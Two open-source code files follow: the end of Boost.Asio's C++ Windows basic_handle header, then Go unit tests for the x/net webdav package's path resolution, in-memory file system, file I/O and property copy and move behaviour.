BOOST_ASIO_MOVE_CAST(basic_handle)(other))
{
}
/// Move-assign a basic_handle from another.
/**
* This assignment operator moves a handle from one object to another.
*
* @param other The other basic_handle object from which the move will occur.
*
* @note Following the move, the moved-from object is in the same state as if
* constructed using the @c basic_handle(io_service&) constructor.
*/
basic_handle& operator=(basic_handle&& other)
{
basic_io_object<HandleService>::operator=(
BOOST_ASIO_MOVE_CAST(basic_handle)(other));
return *this;
}
#endif // defined(BOOST_ASIO_HAS_MOVE) || defined(GENERATING_DOCUMENTATION)
/// Get a reference to the lowest layer.
/**
* This function returns a reference to the lowest layer in a stack of
* layers. Since a basic_handle cannot contain any further layers, it simply
* returns a reference to itself.
*
* @return A reference to the lowest layer in the stack of layers. Ownership
* is not transferred to the caller.
*/
lowest_layer_type& lowest_layer()
{
return *this;
}
/// Get a const reference to the lowest layer.
/**
* This function returns a const reference to the lowest layer in a stack of
* layers. Since a basic_handle cannot contain any further layers, it simply
* returns a reference to itself.
*
* @return A const reference to the lowest layer in the stack of layers.
* Ownership is not transferred to the caller.
*/
const lowest_layer_type& lowest_layer() const
{
return *this;
}
/// Assign an existing native handle to the handle.
/**
* This function opens the handle to hold an existing native handle.
*
* @param handle A native handle.
*
* @throws boost::system::system_error Thrown on failure.
*/
void assign(const native_handle_type& handle)
{
boost::system::error_code ec;
this->get_service().assign(this->get_implementation(), handle, ec);
boost::asio::detail::throw_error(ec, "assign");
}
/// Assign an existing native handle to the handle.
/**
* This function opens the handle to hold an existing native handle.
*
* @param handle A native handle.
*
* @param ec Set to indicate what error occurred, if any.
*/
boost::system::error_code assign(const native_handle_type& handle,
boost::system::error_code& ec)
{
return this->get_service().assign(this->get_implementation(), handle, ec);
}
/// Determine whether the handle is open.
bool is_open() const
{
return this->get_service().is_open(this->get_implementation());
}
/// Close the handle.
/**
* This function is used to close the handle. Any asynchronous read or write
* operations will be cancelled immediately, and will complete with the
* boost::asio::error::operation_aborted error.
*
* @throws boost::system::system_error Thrown on failure.
*/
void close()
{
boost::system::error_code ec;
this->get_service().close(this->get_implementation(), ec);
boost::asio::detail::throw_error(ec, "close");
}
/// Close the handle.
/**
* This function is used to close the handle. Any asynchronous read or write
* operations will be cancelled immediately, and will complete with the
* boost::asio::error::operation_aborted error.
*
* @param ec Set to indicate what error occurred, if any.
*/
boost::system::error_code close(boost::system::error_code& ec)
{
return this->get_service().close(this->get_implementation(), ec);
}
/// (Deprecated: Use native_handle().) Get the native handle representation.
/**
* This function may be used to obtain the underlying representation of the
* handle. This is intended to allow access to native handle functionality
* that is not otherwise provided.
*/
native_type native()
{
return this->get_service().native_handle(this->get_implementation());
}
/// Get the native handle representation.
/**
* This function may be used to obtain the underlying representation of the
* handle. This is intended to allow access to native handle functionality
* that is not otherwise provided.
*/
native_handle_type native_handle()
{
return this->get_service().native_handle(this->get_implementation());
}
/// Cancel all asynchronous operations associated with the handle.
/**
* This function causes all outstanding asynchronous read or write operations
* to finish immediately, and the handlers for cancelled operations will be
* passed the boost::asio::error::operation_aborted error.
*
* @throws boost::system::system_error Thrown on failure.
*/
void cancel()
{
boost::system::error_code ec;
this->get_service().cancel(this->get_implementation(), ec);
boost::asio::detail::throw_error(ec, "cancel");
}
/// Cancel all asynchronous operations associated with the handle.
/**
* This function causes all outstanding asynchronous read or write operations
* to finish immediately, and the handlers for cancelled operations will be
* passed the boost::asio::error::operation_aborted error.
*
* @param ec Set to indicate what error occurred, if any.
*/
boost::system::error_code cancel(boost::system::error_code& ec)
{
return this->get_service().cancel(this->get_implementation(), ec);
}
protected:
/// Protected destructor to prevent deletion through this type.
~basic_handle()
{
}
};
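// Editorial sketch (hypothetical usage): concrete types such as
// windows::stream_handle are built on this template; a typical lifecycle is
//
// boost::asio::io_service io_service;
// boost::asio::windows::stream_handle handle(io_service, native_handle);
// if (handle.is_open())
// handle.close();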
} // namespace windows
} // namespace asio
} // namespace boost
#include <boost/asio/detail/pop_options.hpp>
#endif // defined(BOOST_ASIO_HAS_WINDOWS_RANDOM_ACCESS_HANDLE)
// || defined(BOOST_ASIO_HAS_WINDOWS_STREAM_HANDLE)
// || defined(BOOST_ASIO_HAS_WINDOWS_OBJECT_HANDLE)
// || defined(GENERATING_DOCUMENTATION)
#endif // BOOST_ASIO_WINDOWS_BASIC_HANDLE_HPP
| {
"pile_set_name": "Github"
} |
// Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package webdav
import (
"encoding/xml"
"fmt"
"io"
"io/ioutil"
"os"
"path"
"path/filepath"
"reflect"
"runtime"
"sort"
"strconv"
"strings"
"testing"
"golang.org/x/net/context"
)
func TestSlashClean(t *testing.T) {
testCases := []string{
"",
".",
"/",
"/./",
"//",
"//.",
"//a",
"/a",
"/a/b/c",
"/a//b/./../c/d/",
"a",
"a/b/c",
}
for _, tc := range testCases {
got := slashClean(tc)
want := path.Clean("/" + tc)
if got != want {
t.Errorf("tc=%q: got %q, want %q", tc, got, want)
}
}
}
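// Editorial sketch: a slashClean consistent with the cases above simply
// roots the name and cleans it. The package's real implementation lives
// elsewhere; this restatement is for illustration only.
//
// func slashClean(name string) string {
// if name == "" || name[0] != '/' {
// name = "/" + name
// }
// return path.Clean(name)
// }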
func TestDirResolve(t *testing.T) {
testCases := []struct {
dir, name, want string
}{
{"/", "", "/"},
{"/", "/", "/"},
{"/", ".", "/"},
{"/", "./a", "/a"},
{"/", "..", "/"},
{"/", "..", "/"},
{"/", "../", "/"},
{"/", "../.", "/"},
{"/", "../a", "/a"},
{"/", "../..", "/"},
{"/", "../bar/a", "/bar/a"},
{"/", "../baz/a", "/baz/a"},
{"/", "...", "/..."},
{"/", ".../a", "/.../a"},
{"/", ".../..", "/"},
{"/", "a", "/a"},
{"/", "a/./b", "/a/b"},
{"/", "a/../../b", "/b"},
{"/", "a/../b", "/b"},
{"/", "a/b", "/a/b"},
{"/", "a/b/c/../../d", "/a/d"},
{"/", "a/b/c/../../../d", "/d"},
{"/", "a/b/c/../../../../d", "/d"},
{"/", "a/b/c/d", "/a/b/c/d"},
{"/foo/bar", "", "/foo/bar"},
{"/foo/bar", "/", "/foo/bar"},
{"/foo/bar", ".", "/foo/bar"},
{"/foo/bar", "./a", "/foo/bar/a"},
{"/foo/bar", "..", "/foo/bar"},
{"/foo/bar", "../", "/foo/bar"},
{"/foo/bar", "../.", "/foo/bar"},
{"/foo/bar", "../a", "/foo/bar/a"},
{"/foo/bar", "../..", "/foo/bar"},
{"/foo/bar", "../bar/a", "/foo/bar/bar/a"},
{"/foo/bar", "../baz/a", "/foo/bar/baz/a"},
{"/foo/bar", "...", "/foo/bar/..."},
{"/foo/bar", ".../a", "/foo/bar/.../a"},
{"/foo/bar", ".../..", "/foo/bar"},
{"/foo/bar", "a", "/foo/bar/a"},
{"/foo/bar", "a/./b", "/foo/bar/a/b"},
{"/foo/bar", "a/../../b", "/foo/bar/b"},
{"/foo/bar", "a/../b", "/foo/bar/b"},
{"/foo/bar", "a/b", "/foo/bar/a/b"},
{"/foo/bar", "a/b/c/../../d", "/foo/bar/a/d"},
{"/foo/bar", "a/b/c/../../../d", "/foo/bar/d"},
{"/foo/bar", "a/b/c/../../../../d", "/foo/bar/d"},
{"/foo/bar", "a/b/c/d", "/foo/bar/a/b/c/d"},
{"/foo/bar/", "", "/foo/bar"},
{"/foo/bar/", "/", "/foo/bar"},
{"/foo/bar/", ".", "/foo/bar"},
{"/foo/bar/", "./a", "/foo/bar/a"},
{"/foo/bar/", "..", "/foo/bar"},
{"/foo//bar///", "", "/foo/bar"},
{"/foo//bar///", "/", "/foo/bar"},
{"/foo//bar///", ".", "/foo/bar"},
{"/foo//bar///", "./a", "/foo/bar/a"},
{"/foo//bar///", "..", "/foo/bar"},
{"/x/y/z", "ab/c\x00d/ef", ""},
{".", "", "."},
{".", "/", "."},
{".", ".", "."},
{".", "./a", "a"},
{".", "..", "."},
{".", "..", "."},
{".", "../", "."},
{".", "../.", "."},
{".", "../a", "a"},
{".", "../..", "."},
{".", "../bar/a", "bar/a"},
{".", "../baz/a", "baz/a"},
{".", "...", "..."},
{".", ".../a", ".../a"},
{".", ".../..", "."},
{".", "a", "a"},
{".", "a/./b", "a/b"},
{".", "a/../../b", "b"},
{".", "a/../b", "b"},
{".", "a/b", "a/b"},
{".", "a/b/c/../../d", "a/d"},
{".", "a/b/c/../../../d", "d"},
{".", "a/b/c/../../../../d", "d"},
{".", "a/b/c/d", "a/b/c/d"},
{"", "", "."},
{"", "/", "."},
{"", ".", "."},
{"", "./a", "a"},
{"", "..", "."},
}
for _, tc := range testCases {
d := Dir(filepath.FromSlash(tc.dir))
if got := filepath.ToSlash(d.resolve(tc.name)); got != tc.want {
t.Errorf("dir=%q, name=%q: got %q, want %q", tc.dir, tc.name, got, tc.want)
}
}
}
func TestWalk(t *testing.T) {
type walkStep struct {
name, frag string
final bool
}
testCases := []struct {
dir string
want []walkStep
}{
{"", []walkStep{
{"", "", true},
}},
{"/", []walkStep{
{"", "", true},
}},
{"/a", []walkStep{
{"", "a", true},
}},
{"/a/", []walkStep{
{"", "a", true},
}},
{"/a/b", []walkStep{
{"", "a", false},
{"a", "b", true},
}},
{"/a/b/", []walkStep{
{"", "a", false},
{"a", "b", true},
}},
{"/a/b/c", []walkStep{
{"", "a", false},
{"a", "b", false},
{"b", "c", true},
}},
// The following test case is the one mentioned explicitly
// in the method description.
{"/foo/bar/x", []walkStep{
{"", "foo", false},
{"foo", "bar", false},
{"bar", "x", true},
}},
}
ctx := context.Background()
for _, tc := range testCases {
fs := NewMemFS().(*memFS)
parts := strings.Split(tc.dir, "/")
for p := 2; p < len(parts); p++ {
d := strings.Join(parts[:p], "/")
if err := fs.Mkdir(ctx, d, 0666); err != nil {
t.Errorf("tc.dir=%q: mkdir: %q: %v", tc.dir, d, err)
}
}
i, prevFrag := 0, ""
err := fs.walk("test", tc.dir, func(dir *memFSNode, frag string, final bool) error {
got := walkStep{
name: prevFrag,
frag: frag,
final: final,
}
want := tc.want[i]
if got != want {
return fmt.Errorf("got %+v, want %+v", got, want)
}
i, prevFrag = i+1, frag
return nil
})
if err != nil {
t.Errorf("tc.dir=%q: %v", tc.dir, err)
}
}
}
// find appends to ss the names of the named file and its children. It is
// analogous to the Unix find command.
//
// The returned strings are not guaranteed to be in any particular order.
func find(ctx context.Context, ss []string, fs FileSystem, name string) ([]string, error) {
stat, err := fs.Stat(ctx, name)
if err != nil {
return nil, err
}
ss = append(ss, name)
if stat.IsDir() {
f, err := fs.OpenFile(ctx, name, os.O_RDONLY, 0)
if err != nil {
return nil, err
}
defer f.Close()
children, err := f.Readdir(-1)
if err != nil {
return nil, err
}
for _, c := range children {
ss, err = find(ctx, ss, fs, path.Join(name, c.Name()))
if err != nil {
return nil, err
}
}
}
return ss, nil
}
func testFS(t *testing.T, fs FileSystem) {
errStr := func(err error) string {
switch {
case os.IsExist(err):
return "errExist"
case os.IsNotExist(err):
return "errNotExist"
case err != nil:
return "err"
}
return "ok"
}
// The non-"find" non-"stat" test cases should change the file system state. The
// indentation of the "find"s and "stat"s helps distinguish such test cases.
testCases := []string{
" stat / want dir",
" stat /a want errNotExist",
" stat /d want errNotExist",
" stat /d/e want errNotExist",
"create /a A want ok",
" stat /a want 1",
"create /d/e EEE want errNotExist",
"mk-dir /a want errExist",
"mk-dir /d/m want errNotExist",
"mk-dir /d want ok",
" stat /d want dir",
"create /d/e EEE want ok",
" stat /d/e want 3",
" find / /a /d /d/e",
"create /d/f FFFF want ok",
"create /d/g GGGGGGG want ok",
"mk-dir /d/m want ok",
"mk-dir /d/m want errExist",
"create /d/m/p PPPPP want ok",
" stat /d/e want 3",
" stat /d/f want 4",
" stat /d/g want 7",
" stat /d/h want errNotExist",
" stat /d/m want dir",
" stat /d/m/p want 5",
" find / /a /d /d/e /d/f /d/g /d/m /d/m/p",
"rm-all /d want ok",
" stat /a want 1",
" stat /d want errNotExist",
" stat /d/e want errNotExist",
" stat /d/f want errNotExist",
" stat /d/g want errNotExist",
" stat /d/m want errNotExist",
" stat /d/m/p want errNotExist",
" find / /a",
"mk-dir /d/m want errNotExist",
"mk-dir /d want ok",
"create /d/f FFFF want ok",
"rm-all /d/f want ok",
"mk-dir /d/m want ok",
"rm-all /z want ok",
"rm-all / want err",
"create /b BB want ok",
" stat / want dir",
" stat /a want 1",
" stat /b want 2",
" stat /c want errNotExist",
" stat /d want dir",
" stat /d/m want dir",
" find / /a /b /d /d/m",
"move__ o=F /b /c want ok",
" stat /b want errNotExist",
" stat /c want 2",
" stat /d/m want dir",
" stat /d/n want errNotExist",
" find / /a /c /d /d/m",
"move__ o=F /d/m /d/n want ok",
"create /d/n/q QQQQ want ok",
" stat /d/m want errNotExist",
" stat /d/n want dir",
" stat /d/n/q want 4",
"move__ o=F /d /d/n/z want err",
"move__ o=T /c /d/n/q want ok",
" stat /c want errNotExist",
" stat /d/n/q want 2",
" find / /a /d /d/n /d/n/q",
"create /d/n/r RRRRR want ok",
"mk-dir /u want ok",
"mk-dir /u/v want ok",
"move__ o=F /d/n /u want errExist",
"create /t TTTTTT want ok",
"move__ o=F /d/n /t want errExist",
"rm-all /t want ok",
"move__ o=F /d/n /t want ok",
" stat /d want dir",
" stat /d/n want errNotExist",
" stat /d/n/r want errNotExist",
" stat /t want dir",
" stat /t/q want 2",
" stat /t/r want 5",
" find / /a /d /t /t/q /t/r /u /u/v",
"move__ o=F /t / want errExist",
"move__ o=T /t /u/v want ok",
" stat /u/v/r want 5",
"move__ o=F / /z want err",
" find / /a /d /u /u/v /u/v/q /u/v/r",
" stat /a want 1",
" stat /b want errNotExist",
" stat /c want errNotExist",
" stat /u/v/r want 5",
"copy__ o=F d=0 /a /b want ok",
"copy__ o=T d=0 /a /c want ok",
" stat /a want 1",
" stat /b want 1",
" stat /c want 1",
" stat /u/v/r want 5",
"copy__ o=F d=0 /u/v/r /b want errExist",
" stat /b want 1",
"copy__ o=T d=0 /u/v/r /b want ok",
" stat /a want 1",
" stat /b want 5",
" stat /u/v/r want 5",
"rm-all /a want ok",
"rm-all /b want ok",
"mk-dir /u/v/w want ok",
"create /u/v/w/s SSSSSSSS want ok",
" stat /d want dir",
" stat /d/x want errNotExist",
" stat /d/y want errNotExist",
" stat /u/v/r want 5",
" stat /u/v/w/s want 8",
" find / /c /d /u /u/v /u/v/q /u/v/r /u/v/w /u/v/w/s",
"copy__ o=T d=0 /u/v /d/x want ok",
"copy__ o=T d=∞ /u/v /d/y want ok",
"rm-all /u want ok",
" stat /d/x want dir",
" stat /d/x/q want errNotExist",
" stat /d/x/r want errNotExist",
" stat /d/x/w want errNotExist",
" stat /d/x/w/s want errNotExist",
" stat /d/y want dir",
" stat /d/y/q want 2",
" stat /d/y/r want 5",
" stat /d/y/w want dir",
" stat /d/y/w/s want 8",
" stat /u want errNotExist",
" find / /c /d /d/x /d/y /d/y/q /d/y/r /d/y/w /d/y/w/s",
"copy__ o=F d=∞ /d/y /d/x want errExist",
}
ctx := context.Background()
for i, tc := range testCases {
tc = strings.TrimSpace(tc)
j := strings.IndexByte(tc, ' ')
if j < 0 {
t.Fatalf("test case #%d %q: invalid command", i, tc)
}
op, arg := tc[:j], tc[j+1:]
switch op {
default:
t.Fatalf("test case #%d %q: invalid operation %q", i, tc, op)
case "create":
parts := strings.Split(arg, " ")
if len(parts) != 4 || parts[2] != "want" {
t.Fatalf("test case #%d %q: invalid write", i, tc)
}
f, opErr := fs.OpenFile(ctx, parts[0], os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0666)
if got := errStr(opErr); got != parts[3] {
t.Fatalf("test case #%d %q: OpenFile: got %q (%v), want %q", i, tc, got, opErr, parts[3])
}
if f != nil {
if _, err := f.Write([]byte(parts[1])); err != nil {
t.Fatalf("test case #%d %q: Write: %v", i, tc, err)
}
if err := f.Close(); err != nil {
t.Fatalf("test case #%d %q: Close: %v", i, tc, err)
}
}
case "find":
got, err := find(ctx, nil, fs, "/")
if err != nil {
t.Fatalf("test case #%d %q: find: %v", i, tc, err)
}
sort.Strings(got)
want := strings.Split(arg, " ")
if !reflect.DeepEqual(got, want) {
t.Fatalf("test case #%d %q:\ngot %s\nwant %s", i, tc, got, want)
}
case "copy__", "mk-dir", "move__", "rm-all", "stat":
nParts := 3
switch op {
case "copy__":
nParts = 6
case "move__":
nParts = 5
}
parts := strings.Split(arg, " ")
if len(parts) != nParts {
t.Fatalf("test case #%d %q: invalid %s", i, tc, op)
}
got, opErr := "", error(nil)
switch op {
case "copy__":
depth := 0
if parts[1] == "d=∞" {
depth = infiniteDepth
}
_, opErr = copyFiles(ctx, fs, parts[2], parts[3], parts[0] == "o=T", depth, 0)
case "mk-dir":
opErr = fs.Mkdir(ctx, parts[0], 0777)
case "move__":
_, opErr = moveFiles(ctx, fs, parts[1], parts[2], parts[0] == "o=T")
case "rm-all":
opErr = fs.RemoveAll(ctx, parts[0])
case "stat":
var stat os.FileInfo
fileName := parts[0]
if stat, opErr = fs.Stat(ctx, fileName); opErr == nil {
if stat.IsDir() {
got = "dir"
} else {
got = strconv.Itoa(int(stat.Size()))
}
if fileName == "/" {
// For a Dir FileSystem, the virtual file system root maps to a
// real file system name like "/tmp/webdav-test012345", which does
// not end with "/". We skip such cases.
} else if statName := stat.Name(); path.Base(fileName) != statName {
t.Fatalf("test case #%d %q: file name %q inconsistent with stat name %q",
i, tc, fileName, statName)
}
}
}
if got == "" {
got = errStr(opErr)
}
if parts[len(parts)-2] != "want" {
t.Fatalf("test case #%d %q: invalid %s", i, tc, op)
}
if want := parts[len(parts)-1]; got != want {
t.Fatalf("test case #%d %q: got %q (%v), want %q", i, tc, got, opErr, want)
}
}
}
}
func TestDir(t *testing.T) {
switch runtime.GOOS {
case "nacl":
t.Skip("see golang.org/issue/12004")
case "plan9":
t.Skip("see golang.org/issue/11453")
}
td, err := ioutil.TempDir("", "webdav-test")
if err != nil {
t.Fatal(err)
}
defer os.RemoveAll(td)
testFS(t, Dir(td))
}
func TestMemFS(t *testing.T) {
testFS(t, NewMemFS())
}
func TestMemFSRoot(t *testing.T) {
ctx := context.Background()
fs := NewMemFS()
for i := 0; i < 5; i++ {
stat, err := fs.Stat(ctx, "/")
if err != nil {
t.Fatalf("i=%d: Stat: %v", i, err)
}
if !stat.IsDir() {
t.Fatalf("i=%d: Stat.IsDir is false, want true", i)
}
f, err := fs.OpenFile(ctx, "/", os.O_RDONLY, 0)
if err != nil {
t.Fatalf("i=%d: OpenFile: %v", i, err)
}
defer f.Close()
children, err := f.Readdir(-1)
if err != nil {
t.Fatalf("i=%d: Readdir: %v", i, err)
}
if len(children) != i {
t.Fatalf("i=%d: got %d children, want %d", i, len(children), i)
}
if _, err := f.Write(make([]byte, 1)); err == nil {
t.Fatalf("i=%d: Write: got nil error, want non-nil", i)
}
if err := fs.Mkdir(ctx, fmt.Sprintf("/dir%d", i), 0777); err != nil {
t.Fatalf("i=%d: Mkdir: %v", i, err)
}
}
}
func TestMemFileReaddir(t *testing.T) {
ctx := context.Background()
fs := NewMemFS()
if err := fs.Mkdir(ctx, "/foo", 0777); err != nil {
t.Fatalf("Mkdir: %v", err)
}
readdir := func(count int) ([]os.FileInfo, error) {
f, err := fs.OpenFile(ctx, "/foo", os.O_RDONLY, 0)
if err != nil {
t.Fatalf("OpenFile: %v", err)
}
defer f.Close()
return f.Readdir(count)
}
if got, err := readdir(-1); len(got) != 0 || err != nil {
t.Fatalf("readdir(-1): got %d fileInfos with err=%v, want 0, <nil>", len(got), err)
}
if got, err := readdir(+1); len(got) != 0 || err != io.EOF {
t.Fatalf("readdir(+1): got %d fileInfos with err=%v, want 0, EOF", len(got), err)
}
}
func TestMemFile(t *testing.T) {
testCases := []string{
"wantData ",
"wantSize 0",
"write abc",
"wantData abc",
"write de",
"wantData abcde",
"wantSize 5",
"write 5*x",
"write 4*y+2*z",
"write 3*st",
"wantData abcdexxxxxyyyyzzststst",
"wantSize 22",
"seek set 4 want 4",
"write EFG",
"wantData abcdEFGxxxyyyyzzststst",
"wantSize 22",
"seek set 2 want 2",
"read cdEF",
"read Gx",
"seek cur 0 want 8",
"seek cur 2 want 10",
"seek cur -1 want 9",
"write J",
"wantData abcdEFGxxJyyyyzzststst",
"wantSize 22",
"seek cur -4 want 6",
"write ghijk",
"wantData abcdEFghijkyyyzzststst",
"wantSize 22",
"read yyyz",
"seek cur 0 want 15",
"write ",
"seek cur 0 want 15",
"read ",
"seek cur 0 want 15",
"seek end -3 want 19",
"write ZZ",
"wantData abcdEFghijkyyyzzstsZZt",
"wantSize 22",
"write 4*A",
"wantData abcdEFghijkyyyzzstsZZAAAA",
"wantSize 25",
"seek end 0 want 25",
"seek end -5 want 20",
"read Z+4*A",
"write 5*B",
"wantData abcdEFghijkyyyzzstsZZAAAABBBBB",
"wantSize 30",
"seek end 10 want 40",
"write C",
"wantData abcdEFghijkyyyzzstsZZAAAABBBBB..........C",
"wantSize 41",
"write D",
"wantData abcdEFghijkyyyzzstsZZAAAABBBBB..........CD",
"wantSize 42",
"seek set 43 want 43",
"write E",
"wantData abcdEFghijkyyyzzstsZZAAAABBBBB..........CD.E",
"wantSize 44",
"seek set 0 want 0",
"write 5*123456789_",
"wantData 123456789_123456789_123456789_123456789_123456789_",
"wantSize 50",
"seek cur 0 want 50",
"seek cur -99 want err",
}
ctx := context.Background()
const filename = "/foo"
fs := NewMemFS()
f, err := fs.OpenFile(ctx, filename, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0666)
if err != nil {
t.Fatalf("OpenFile: %v", err)
}
defer f.Close()
for i, tc := range testCases {
j := strings.IndexByte(tc, ' ')
if j < 0 {
t.Fatalf("test case #%d %q: invalid command", i, tc)
}
op, arg := tc[:j], tc[j+1:]
// Expand an arg like "3*a+2*b" to "aaabb".
parts := strings.Split(arg, "+")
for j, part := range parts {
if k := strings.IndexByte(part, '*'); k >= 0 {
repeatCount, repeatStr := part[:k], part[k+1:]
n, err := strconv.Atoi(repeatCount)
if err != nil {
t.Fatalf("test case #%d %q: invalid repeat count %q", i, tc, repeatCount)
}
parts[j] = strings.Repeat(repeatStr, n)
}
}
arg = strings.Join(parts, "")
switch op {
default:
t.Fatalf("test case #%d %q: invalid operation %q", i, tc, op)
case "read":
buf := make([]byte, len(arg))
if _, err := io.ReadFull(f, buf); err != nil {
t.Fatalf("test case #%d %q: ReadFull: %v", i, tc, err)
}
if got := string(buf); got != arg {
t.Fatalf("test case #%d %q:\ngot %q\nwant %q", i, tc, got, arg)
}
case "seek":
parts := strings.Split(arg, " ")
if len(parts) != 4 {
t.Fatalf("test case #%d %q: invalid seek", i, tc)
}
whence := 0
switch parts[0] {
default:
t.Fatalf("test case #%d %q: invalid seek whence", i, tc)
case "set":
whence = os.SEEK_SET
case "cur":
whence = os.SEEK_CUR
case "end":
whence = os.SEEK_END
}
offset, err := strconv.Atoi(parts[1])
if err != nil {
t.Fatalf("test case #%d %q: invalid offset %q", i, tc, parts[1])
}
if parts[2] != "want" {
t.Fatalf("test case #%d %q: invalid seek", i, tc)
}
if parts[3] == "err" {
_, err := f.Seek(int64(offset), whence)
if err == nil {
t.Fatalf("test case #%d %q: Seek returned nil error, want non-nil", i, tc)
}
} else {
got, err := f.Seek(int64(offset), whence)
if err != nil {
t.Fatalf("test case #%d %q: Seek: %v", i, tc, err)
}
want, err := strconv.Atoi(parts[3])
if err != nil {
t.Fatalf("test case #%d %q: invalid want %q", i, tc, parts[3])
}
if got != int64(want) {
t.Fatalf("test case #%d %q: got %d, want %d", i, tc, got, want)
}
}
case "write":
n, err := f.Write([]byte(arg))
if err != nil {
t.Fatalf("test case #%d %q: write: %v", i, tc, err)
}
if n != len(arg) {
t.Fatalf("test case #%d %q: write returned %d bytes, want %d", i, tc, n, len(arg))
}
case "wantData":
g, err := fs.OpenFile(ctx, filename, os.O_RDONLY, 0666)
if err != nil {
t.Fatalf("test case #%d %q: OpenFile: %v", i, tc, err)
}
gotBytes, err := ioutil.ReadAll(g)
if err != nil {
t.Fatalf("test case #%d %q: ReadAll: %v", i, tc, err)
}
for i, c := range gotBytes {
if c == '\x00' {
gotBytes[i] = '.'
}
}
got := string(gotBytes)
if got != arg {
t.Fatalf("test case #%d %q:\ngot %q\nwant %q", i, tc, got, arg)
}
if err := g.Close(); err != nil {
t.Fatalf("test case #%d %q: Close: %v", i, tc, err)
}
case "wantSize":
n, err := strconv.Atoi(arg)
if err != nil {
t.Fatalf("test case #%d %q: invalid size %q", i, tc, arg)
}
fi, err := fs.Stat(ctx, filename)
if err != nil {
t.Fatalf("test case #%d %q: Stat: %v", i, tc, err)
}
if got, want := fi.Size(), int64(n); got != want {
t.Fatalf("test case #%d %q: got %d, want %d", i, tc, got, want)
}
}
}
}
// TestMemFileWriteAllocs tests that writing N consecutive 1KiB chunks to a
// memFile doesn't allocate a new buffer for each of those N times. Otherwise,
// calling io.Copy(aMemFile, src) is likely to have quadratic complexity.
func TestMemFileWriteAllocs(t *testing.T) {
if runtime.Compiler == "gccgo" {
t.Skip("gccgo allocates here")
}
ctx := context.Background()
fs := NewMemFS()
f, err := fs.OpenFile(ctx, "/xxx", os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0666)
if err != nil {
t.Fatalf("OpenFile: %v", err)
}
defer f.Close()
xxx := make([]byte, 1024)
for i := range xxx {
xxx[i] = 'x'
}
a := testing.AllocsPerRun(100, func() {
f.Write(xxx)
})
// AllocsPerRun returns an integral value, so we compare the rounded-down
// number to zero.
if a > 0 {
t.Fatalf("%v allocs per run, want 0", a)
}
}
func BenchmarkMemFileWrite(b *testing.B) {
ctx := context.Background()
fs := NewMemFS()
xxx := make([]byte, 1024)
for i := range xxx {
xxx[i] = 'x'
}
b.ResetTimer()
for i := 0; i < b.N; i++ {
f, err := fs.OpenFile(ctx, "/xxx", os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0666)
if err != nil {
b.Fatalf("OpenFile: %v", err)
}
for j := 0; j < 100; j++ {
f.Write(xxx)
}
if err := f.Close(); err != nil {
b.Fatalf("Close: %v", err)
}
if err := fs.RemoveAll(ctx, "/xxx"); err != nil {
b.Fatalf("RemoveAll: %v", err)
}
}
}
func TestCopyMoveProps(t *testing.T) {
ctx := context.Background()
fs := NewMemFS()
create := func(name string) error {
f, err := fs.OpenFile(ctx, name, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0666)
if err != nil {
return err
}
_, wErr := f.Write([]byte("contents"))
cErr := f.Close()
if wErr != nil {
return wErr
}
return cErr
}
patch := func(name string, patches ...Proppatch) error {
f, err := fs.OpenFile(ctx, name, os.O_RDWR, 0666)
if err != nil {
return err
}
_, pErr := f.(DeadPropsHolder).Patch(patches)
cErr := f.Close()
if pErr != nil {
return pErr
}
return cErr
}
props := func(name string) (map[xml.Name]Property, error) {
f, err := fs.OpenFile(ctx, name, os.O_RDWR, 0666)
if err != nil {
return nil, err
}
m, pErr := f.(DeadPropsHolder).DeadProps()
cErr := f.Close()
if pErr != nil {
return nil, pErr
}
if cErr != nil {
return nil, cErr
}
return m, nil
}
p0 := Property{
XMLName: xml.Name{Space: "x:", Local: "boat"},
InnerXML: []byte("pea-green"),
}
p1 := Property{
XMLName: xml.Name{Space: "x:", Local: "ring"},
InnerXML: []byte("1 shilling"),
}
p2 := Property{
XMLName: xml.Name{Space: "x:", Local: "spoon"},
InnerXML: []byte("runcible"),
}
p3 := Property{
XMLName: xml.Name{Space: "x:", Local: "moon"},
InnerXML: []byte("light"),
}
if err := create("/src"); err != nil {
t.Fatalf("create /src: %v", err)
}
if err := patch("/src", Proppatch{Props: []Property{p0, p1}}); err != nil {
t.Fatalf("patch /src +p0 +p1: %v", err)
}
if _, err := copyFiles(ctx, fs, "/src", "/tmp", true, infiniteDepth, 0); err != nil {
t.Fatalf("copyFiles /src /tmp: %v", err)
}
if _, err := moveFiles(ctx, fs, "/tmp", "/dst", true); err != nil {
t.Fatalf("moveFiles /tmp /dst: %v", err)
}
if err := patch("/src", Proppatch{Props: []Property{p0}, Remove: true}); err != nil {
t.Fatalf("patch /src -p0: %v", err)
}
if err := patch("/src", Proppatch{Props: []Property{p2}}); err != nil {
t.Fatalf("patch /src +p2: %v", err)
}
if err := patch("/dst", Proppatch{Props: []Property{p1}, Remove: true}); err != nil {
t.Fatalf("patch /dst -p1: %v", err)
}
if err := patch("/dst", Proppatch{Props: []Property{p3}}); err != nil {
t.Fatalf("patch /dst +p3: %v", err)
}
gotSrc, err := props("/src")
if err != nil {
t.Fatalf("props /src: %v", err)
}
wantSrc := map[xml.Name]Property{
p1.XMLName: p1,
p2.XMLName: p2,
}
if !reflect.DeepEqual(gotSrc, wantSrc) {
t.Fatalf("props /src:\ngot %v\nwant %v", gotSrc, wantSrc)
}
gotDst, err := props("/dst")
if err != nil {
t.Fatalf("props /dst: %v", err)
}
wantDst := map[xml.Name]Property{
p0.XMLName: p0,
p3.XMLName: p3,
}
if !reflect.DeepEqual(gotDst, wantDst) {
t.Fatalf("props /dst:\ngot %v\nwant %v", gotDst, wantDst)
}
}
func TestWalkFS(t *testing.T) {
testCases := []struct {
desc string
buildfs []string
startAt string
depth int
walkFn filepath.WalkFunc
want []string
}{{
"just root",
[]string{},
"/",
infiniteDepth,
nil,
[]string{
"/",
},
}, {
"infinite walk from root",
[]string{
"mkdir /a",
"mkdir /a/b",
"touch /a/b/c",
"mkdir /a/d",
"mkdir /e",
"touch /f",
},
"/",
infiniteDepth,
nil,
[]string{
"/",
"/a",
"/a/b",
"/a/b/c",
"/a/d",
"/e",
"/f",
},
}, {
"infinite walk from subdir",
[]string{
"mkdir /a",
"mkdir /a/b",
"touch /a/b/c",
"mkdir /a/d",
"mkdir /e",
"touch /f",
},
